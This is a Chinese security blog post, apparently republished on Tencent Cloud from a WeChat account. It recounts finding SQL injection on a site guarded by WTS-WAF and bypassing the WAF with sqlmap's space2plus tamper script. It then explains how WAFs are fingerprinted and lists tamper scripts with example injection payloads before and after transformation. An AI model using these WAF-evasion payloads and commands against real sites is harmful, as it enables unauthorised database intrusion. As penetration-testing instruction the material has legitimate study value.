前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >给了一个站点测试,发现有狗,为什么没有网站截图,因为害怕

给了一个站点测试,发现有狗,为什么没有网站截图,因为害怕

作者头像
鸿鹄实验室
发布2021-04-15 13:10:45
9030
发布2021-04-15 13:10:45
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室
  1. 可能存在sql注入,寻找注入点,单引号闭合报错,存在注入
  2. and 1=1 测试,被WATS-WAF拦截
  1. 此网站存在WAF,所以我们需要绕过他的过滤规则。 经过测试WTS-WAF,过滤了空格,我们使用+号即可绕过
  2. 手工跑太麻烦 上sqlmap,需要绕过 WTS-WAF,在sqlmap中如何绕过waf,可以使用—tamper参数对数据做修改来绕过waf。
  3. 由于之前已经知道了是过滤空格, 所以tamper用 space2plus.py 这个脚本 sqlmap.py -u http://www.xx.com/xxxx.php?id=29 -v 3 --dbs space2plus.py | 脚本名称 | 适用数据库 | 作用 | 使用脚本前 | 使用脚本后 | | :———————-: | :————: | :——————: | :—————————-: | :—————————-: | | space2plus.py | ALL | 用加号替换空格 | SELECT * FROM users | SELECT+*+FROM+users | - v的作用是 :观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的,可以使用-v参数 ,共有七个等级,默认为1 0)、只显示python错误以及严重的信息。 1)、同时显示基本信息和警告信息。(默认) 2、同时显示debug信息。 3)、同时显示注入的payload。 4)、同时显示HTTP请求。 5)、同时显示HTTP响应头。 6)、同时显示HTTP响应页面。 如果你想看到sqlmap发送的测试payload最好的等级就是3。
  4. 绕过waf,就可以sqlmap一把梭了。

写一下关于WAF 和sqlmap — tamper脚本的一些东西

WAF

  1. waf( Web应用程序防火墙 ):Web应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件,在设备设备中运行或在运行通用操作系统的典型服务器中实现。它可以是独立设备,也可以集成到其他网络组件中
  2. waf有很多版本:360 云锁 安全狗 等等
  3. 该如何判断waf种类呢,我们可以通过他的阻止相应页面,响应头,等特性来判断其为哪一种waf 例如:WTS-waf的判断方法就是: 被阻止的相应页面具有WTS-WAF关键字 Server表头含有wts的值
  4. 如何绕过waf 1、注释方式绕过 2、编码方式绕过 3、大小写方式绕过 4、缓冲区溢出导致拒绝服务从而绕过(fuzz技术)
  5. 学艺不精,浮于表面写一下 sqlmap —tamper
  6. sqlmap可以使用—tamper参数对数据做修改来绕过Waf等设备 命令如下: sqlmap -u [url] --tamper [模块名]
  7. sqlmap的绕过脚本在目录usr/share/golismero/tools/sqlmap/tamper
  1. 我们可以使用—identify-waf查看目标网站是否有安全防护
  2. 列举一些常用的tamper脚本 base64encode.py 适用数据库:ALL 作用:替换为base64编码 使用脚本前:1' AND SLEEP(5)# 使用脚本后:MScgQU5EIFNMRUVQKDUpIw== space2plus.py 适用数据库:ALL 作用:用加号替换空格 使用脚本前:SELECT id FROM users 使用脚本后:SELECT+id+FROM+users apostrophemask.py 适用数据库:ALL 作用:将引号替换为utf-8,用于过滤单引号 使用脚本前:1 AND '1'='1 使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 space2randomblank.py 适用数据库:ALL 作用:将空格替换为其他有效字符 使用脚本前:SELECT id FROM users 使用脚本后:SELECT%0Did%0DFROM%0Ausers

nonrecursivereplacement.py

适用数据库:ALL 作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤 器,例如将select替换为空) 使用脚本前:1 UNION SELECT 2-- 使用脚本后:1 UNIOUNIONN SELESELECTCT 2--

unionalltounion.py

适用数据库:ALL 作用:将union allselect 替换为unionselect 使用脚本前:-1 UNION ALL SELECT 使用脚本后:-1 UNION SELECT

chardoubleencode.py

适用数据库:ALL 作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符) 使用脚本前:SELECT FIELD FROM%20TABLE 使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

randomcomments.py

适用数据库:ALL 作用:用注释符分割sql关键字 使用脚本前:tamper('INSERT') 使用脚本后:I/**/N/**/SERT

appendnullbyte.py

适用数据库:ALL 作用:在有效载荷的结束位置加载null字节字符编码 使用脚本前:1 AND 1=1 使用脚本后:1 AND 1=1%00

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-11-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 写一下关于WAF 和sqlmap — tamper脚本的一些东西
    • WAF
    相关产品与服务
    数据库
    云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档